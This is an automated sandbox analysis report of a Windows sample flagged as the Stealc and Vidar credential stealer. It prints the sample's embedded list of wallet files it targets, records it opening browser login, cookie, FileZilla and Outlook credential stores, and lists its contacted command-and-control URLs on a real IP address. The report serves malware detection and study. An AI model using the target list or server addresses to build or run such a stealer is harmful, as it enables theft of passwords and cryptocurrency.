Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: ge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe, 00000006.00000002.1538633015.0000000001989000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp*
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: ge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|
Source: file.exe String found in binary or memory: inance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger L
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: ge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe, 00000006.00000002.1538633015.0000000001989000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\*.*
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite-wal Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 5944, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 6.2.file.exe.d90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.1311274897.00000000056A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1537629234.0000000000D91000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1538633015.000000000192E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5944, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 5944, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1538297 Sample: file.exe Startdate: 20/10/2024 Architecture: WINDOWS Score: 100 20 Suricata IDS alerts for network traffic 2->20 22 Found malware configuration 2->22 24 Antivirus detection for URL or domain 2->24 26 10 other signatures 2->26 5 file.exe 34 2->5         started        process3 dnsIp4 18 185.215.113.37, 49708, 80 WHOLESALECONNECTIONSNL Portugal 5->18 10 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 5->10 dropped 12 C:\Users\user\AppData\...\softokn3[1].dll, PE32 5->12 dropped 14 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 5->14 dropped 16 9 other files (none is malicious) 5->16 dropped 28 Detected unpacking (changes PE section rights) 5->28 30 Tries to detect sandboxes and other dynamic analysis tools (window names) 5->30 32 Tries to steal Mail credentials (via file / registry access) 5->32 34 12 other signatures 5->34 file5 signatures6
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.37
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.37/ true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/e2b1563c6670f193.php true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll true
  • URL Reputation: malware
 unknown